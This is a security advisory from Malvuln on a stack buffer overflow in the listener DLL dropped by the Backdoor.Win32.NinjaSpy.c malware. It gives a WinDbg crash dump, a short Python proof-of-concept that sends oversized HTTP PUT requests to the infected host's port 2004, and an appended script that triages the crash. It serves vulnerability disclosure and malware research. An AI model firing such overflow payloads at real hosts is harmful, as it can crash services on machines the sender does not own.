Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NinjaSpy.c
Vulnerability: Remote Stack Buffer Overflow
Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with a large payload of characters we can cause a buffer overflow.
Type: PE32
MD5: 6eece319bc108576bd1f4a8364616264
Vuln ID: MVID-2021-0018
Dropped files: cmd.dll
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/08/2021

Memory Dump:

0:000> .ecxr
eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d
eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
cmd+0x40f57:
00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0 ds:002b:414142c1=????????

FAULTING_IP:
cmd+40f57
00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00440f57 (cmd+0x00040f57)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 414142c1
Attempt to read from address 414142c1

PROCESS_NAME:  cmd.dll

OVERLAPPED_MODULE: Address regions for 'jscript9' and 'resourcepolicyclient.dll' overlap

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  414142c1

READ_ADDRESS:  414142c1

FOLLOWUP_IP:
cmd+40f57
00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0

MOD_LIST:

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  000014f4

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 764ee0bb to 00440f57

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57
0019eb44 764f8849 03fe0e9d 00920602 00000046 user32!_InternalCallWinProc+0x2b
0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20
0019ec38 764e8503 03fe0e9d 00000000 00000046 user32!UserCallWinProcCheckWow+0x1be
0019eca0 764dfbfa 02c1f600 00000000 00000046 user32!DispatchClientMessage+0x1b3
0019ece8 773d0bcd 0019ed04 00000038 0019ee20 user32!__fnINOUTLPWINDOWPOS+0x4a
0019ed38 76832eec 76521878 000f0a14 76521760 ntdll!KiUserCallbackDispatcher+0x4d
0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc
0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118
0019ed88 764f8849 76521760 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019ee30 764dbf65 0055060a 00000110 000f0a14 user32!UserCallDlgProcCheckWow+0x10f
0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115
0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25
0019eed8 764f8849 764dbe20 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019efcc 764fa89c 7a4afc30 00007ffe 00000110 user32!UserCallWinProcCheckWow+0x1be
0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff
0019f154 76506533 764d0000 0267a708 00000000 user32!InternalCreateDialog+0x1137
0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8
0019f264 768339ec 0019f3d0 76522093 0019f3e8 user32!SoftModalMessageBox+0x72b
0019f26c 76522093 0019f3e8 07c43d40 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc
0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a
0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743
0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a
0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f
0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446
0019fd94 764f8849 03fe0f05 005b0464 00000401 user32!_InternalCallWinProc+0x2b
0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20
0019fe88 764e90dc 03fe0f05 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c user32!DispatchMessageWorker+0x4ac
0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10
0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c
0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c
0019ff94 773c4a77 002d2000 8aaf072f 00000000 kernel32!BaseThreadInitThunk+0x24
0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f
0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  cmd+40f57

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: cmd

IMAGE_NAME:  cmd.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  2a425e19

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57

Exploit/PoC:

from socket import *

MALWARE_HOST="x.x.x.x"   # host running the infected cmd.dll listener
PORT=2004                # one of the two listening ports (2003 / 2004)
c=1                      # request counter
JUNK="A"*8601            # 0x41 fill pattern, visible in eax/ebx in the dump above
AMT=10                   # number of consecutive requests to send

PAYLOAD = "PUT /"+JUNK+" HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n"+ "Accept-Charset: "+JUNK

def doit():
    global c, JUNK, PAYLOAD, AMT
    while True:
        # Python 2 socket API: send() accepts a str here; Python 3 requires bytes
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST, PORT))
        s.send(PAYLOAD)
        s.close()
        c+=1
        if c==AMT:
            print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow")
            print("MD5: 6eece319bc108576bd1f4a8364616264")
            print("By Malvuln")
            exit()

if __name__=="__main__":
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
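Crash-triage helper, added here as an example and not part of the Malvuln advisory or the specimen. It shows why the dump above is classified as INVALID_POINTER_READ_FILL_PATTERN_41414141: it parses the `.ecxr` register state and the memory operand of the faulting `cmp dword ptr [ebx+180h],0`, recomputes the effective address from ebx, checks that it equals the read address in the exception record, and flags every register that holds a repeated fill byte. The dump excerpt is copied from the advisory; the regular expressions, function names and verdict strings are my own assumptions.

```python
import re

# Excerpt of the WinDbg output reproduced from the advisory above, embedded as
# constructed test input for this script (not a live debugger session).
CRASH_DUMP = """\
0:000> .ecxr
eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d
eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0         nv up ei pl nz na po nc
cmd+0x40f57:
00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0 ds:002b:414142c1=????????
ExceptionAddress: 00440f57 (cmd+0x00040f57)
   ExceptionCode: c0000005 (Access violation)
   Parameter[0]: 00000000
   Parameter[1]: 414142c1
"""

# 32-bit general-purpose registers as printed by .ecxr (name=8 hex digits).
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
# Memory operand of the faulting instruction, e.g. "[ebx+180h]" (base, sign, displacement).
MEM_RE = re.compile(r"\[(e[abcd]x|e[sd]i|e[bs]p)([+-])([0-9a-f]+)h?\]", re.I)
# Exception record fields: Parameter[1] is the faulting data address for an access violation.
PARAM_RE = re.compile(r"Parameter\[(\d)\]:\s*([0-9a-f]{8})")
CODE_RE = re.compile(r"ExceptionCode:\s*([0-9a-f]{8})")

STATUS_ACCESS_VIOLATION = 0xC0000005


def fill_byte(value):
    """Return the byte if all four bytes of a 32-bit value are identical (0x41414141 -> 0x41), else None."""
    b = value.to_bytes(4, "little")
    return b[0] if len(set(b)) == 1 else None


def parse_registers(dump):
    """Map register name -> integer value from the .ecxr register lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def triage(dump):
    """Classify an access violation: is the dereferenced pointer built from an input fill pattern?"""
    regs = parse_registers(dump)
    params = {int(i): int(v, 16) for i, v in PARAM_RE.findall(dump)}
    code = CODE_RE.search(dump)
    operand = MEM_RE.search(dump)
    if operand is None:
        return {"verdict": "no memory operand found in faulting instruction"}

    base = operand.group(1).lower()
    sign = operand.group(2)
    disp = int(operand.group(3), 16)

    # Recompute the effective address from the register state at the crash ...
    ea = regs[base] + disp if sign == "+" else regs[base] - disp
    ea &= 0xFFFFFFFF
    # ... and compare it with the address the exception record reports.
    fault_addr = params.get(1)

    # Registers whose value is a repeated single byte (the classic "AAAA" overflow signature).
    filled = {}
    for name, value in regs.items():
        fb = fill_byte(value)
        if fb is not None:
            filled[name] = fb

    is_av = code is not None and int(code.group(1), 16) == STATUS_ACCESS_VIOLATION
    if is_av and base in filled:
        verdict = "attacker-controlled pointer dereference via %s (fill byte 0x%02x)" % (base, filled[base])
    elif is_av:
        verdict = "access violation with uncontrolled pointer"
    else:
        verdict = "not an access violation"

    return {
        "base_register": base,
        "displacement": disp,
        "computed_address": ea,
        "fault_address": fault_addr,
        "address_matches": ea == fault_addr,
        "filled_registers": sorted(filled),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage(CRASH_DUMP).items():
        print("%-18s %s" % (key, hex(value) if isinstance(value, int) and not isinstance(value, bool) else value))
```

For the advisory's dump this reports ebx+0x180 = 0x414142c1, matching READ_ADDRESS, with eax and ebx both filled with 0x41; a crash whose base register is not pattern-filled would instead be reported as an uncontrolled pointer and would need further investigation before being treated as an overflow.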